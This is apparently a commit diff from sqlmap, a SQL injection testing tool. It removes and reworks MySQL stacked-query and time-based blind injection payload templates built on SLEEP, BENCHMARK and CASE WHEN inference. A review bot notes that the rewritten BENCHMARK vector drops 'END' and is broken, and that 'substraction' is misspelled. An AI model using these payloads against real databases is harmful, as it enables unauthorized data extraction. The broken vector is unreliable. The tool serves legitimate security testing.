

Commit 79d0890

committed
Cleaning some redundant payload(s)
1 parent d27b33e commit 79d0890

3 files changed

Lines changed: 16 additions & 180 deletions


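--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.revision import getRevisionNumber
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.5.94"
+VERSION = "1.0.5.95"
 REVISION = getRevisionNumber()
 STABLE = VERSION.count('.') <= 2
 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")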

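--- a/xml/payloads/04_stacked_queries.xml
+++ b/xml/payloads/04_stacked_queries.xml
@@ -2,51 +2,10 @@
 
 <root>
 <!-- Stacked queries tests -->
-<test>
-<title>MySQL &gt; 5.0.11 stacked queries (SLEEP - comment)</title>
-<stype>4</stype>
-<level>1</level>
-<risk>1</risk>
-<clause>0</clause>
-<where>1</where>
-<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-<comment>#</comment>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt; 5.0.11</dbms_version>
-</details>
-</test>
-
-<test>
-<title>MySQL &gt; 5.0.11 stacked queries (SLEEP)</title>
-<stype>4</stype>
-<level>2</level>
-<risk>1</risk>
-<clause>0</clause>
-<where>1</where>
-<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt; 5.0.11</dbms_version>
-</details>
-</test>
-
 <test>
 <title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
 <stype>4</stype>
-<level>2</level>
+<level>1</level>
 <risk>1</risk>
 <clause>0</clause>
 <where>1</where>
@@ -67,7 +26,7 @@
 <test>
 <title>MySQL &gt; 5.0.11 stacked queries</title>
 <stype>4</stype>
-<level>3</level>
+<level>2</level>
 <risk>1</risk>
 <clause>0</clause>
 <where>1</where>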

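--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -2,92 +2,10 @@
 
 <root>
 <!-- Time-based boolean tests -->
-<test>
-<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
-<stype>5</stype>
-<level>1</level>
-<risk>1</risk>
-<clause>1,2,3,9</clause>
-<where>1</where>
-<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt;= 5.0.12</dbms_version>
-</details>
-</test>
-
-<test>
-<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
-<stype>5</stype>
-<level>1</level>
-<risk>3</risk>
-<clause>1,2,3,9</clause>
-<where>1</where>
-<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt;= 5.0.12</dbms_version>
-</details>
-</test>
-
-<test>
-<title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
-<stype>5</stype>
-<level>3</level>
-<risk>1</risk>
-<clause>1,2,3,9</clause>
-<where>1</where>
-<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-<comment>#</comment>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt;= 5.0.12</dbms_version>
-</details>
-</test>
-
-<test>
-<title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
-<stype>5</stype>
-<level>3</level>
-<risk>3</risk>
-<clause>1,2,3,9</clause>
-<where>1</where>
-<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-<comment>#</comment>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt;= 5.0.12</dbms_version>
-</details>
-</test>
-
 <test>
 <title>MySQL &gt;= 5.0.12 AND time-based blind</title>
 <stype>5</stype>
-<level>2</level>
+<level>1</level>
 <risk>1</risk>
 <clause>1,2,3,9</clause>
 <where>1</where>
@@ -107,7 +25,7 @@
 <test>
 <title>MySQL &gt;= 5.0.12 OR time-based blind</title>
 <stype>5</stype>
-<level>2</level>
+<level>1</level>
 <risk>3</risk>
 <clause>1,2,3,9</clause>
 <where>1</where>
@@ -127,7 +45,7 @@
 <test>
 <title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
 <stype>5</stype>
-<level>4</level>
+<level>3</level>
 <risk>1</risk>
 <clause>1,2,3,9</clause>
 <where>1</where>
@@ -148,7 +66,7 @@
 <test>
 <title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
 <stype>5</stype>
-<level>4</level>
+<level>3</level>
 <risk>3</risk>
 <clause>1,2,3,9</clause>
 <where>1</where>
@@ -248,51 +166,10 @@
 </details>
 </test>
 
-<test>
-<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SLEEP)</title>
-<stype>5</stype>
-<level>2</level>
-<risk>1</risk>
-<clause>1,2,3,9</clause>
-<where>1</where>
-<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt;= 5.0.12</dbms_version>
-</details>
-</test>
-
-<test>
-<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SLEEP - comment)</title>
-<stype>5</stype>
-<level>4</level>
-<risk>1</risk>
-<clause>1,2,3,9</clause>
-<where>1</where>
-<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-<request>
-<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-<comment>#</comment>
-</request>
-<response>
-<time>[SLEEPTIME]</time>
-</response>
-<details>
-<dbms>MySQL</dbms>
-<dbms_version>&gt;= 5.0.12</dbms_version>
-</details>
-</test>
-
 <test>
 <title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
 <stype>5</stype>
-<level>5</level>
+<level>2</level>
 <risk>1</risk>
 <clause>1,2,3,9</clause>
 <where>1</where>
@@ -312,7 +189,7 @@
 <test>
 <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (comment)</title>
 <stype>5</stype>
-<level>5</level>
+<level>4</level>
 <risk>1</risk>
 <clause>1,2,3,9</clause>
 <where>1</where>
@@ -1392,9 +1269,9 @@
 <risk>1</risk>
 <clause>1,2,3,9</clause>
 <where>3</where>
-<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+<vector>(CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>
@@ -1406,7 +1283,7 @@
 </test>
 
 <test>
-<title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace (SLEEP)</title>
+<title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace (substraction)</title>
 <stype>5</stype>
 <level>3</level>
 <risk>1</risk>
@@ -1432,9 +1309,9 @@
 <risk>2</risk>
 <clause>1,2,3,9</clause>
 <where>3</where>
-<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</vector>
 <request>
-<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1769,9 +1646,9 @@
 <risk>1</risk>
 <clause>2,3</clause>
 <where>1</where>
-<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</vector>
 <request>
-<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>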
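Review bot: The rewritten BENCHMARK `<vector>` and `<payload>` at new lines 1312 and 1314 lose the `END` keyword together with the removed subquery, leaving the CASE expression unterminated; `ELSE [RANDNUM])` should read `ELSE [RANDNUM] END)`, matching the SLEEP variant at new lines 1272 and 1274. As written this test definition would presumably always be rejected as a syntax error and so could never report a finding, which gives anyone relying on the check a silent false negative. The new title at line 1286 also spells "subtraction" as "substraction". The `<test>` elements these lines belong to begin and end outside the visible hunks, so the rest of each definition could not be checked.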
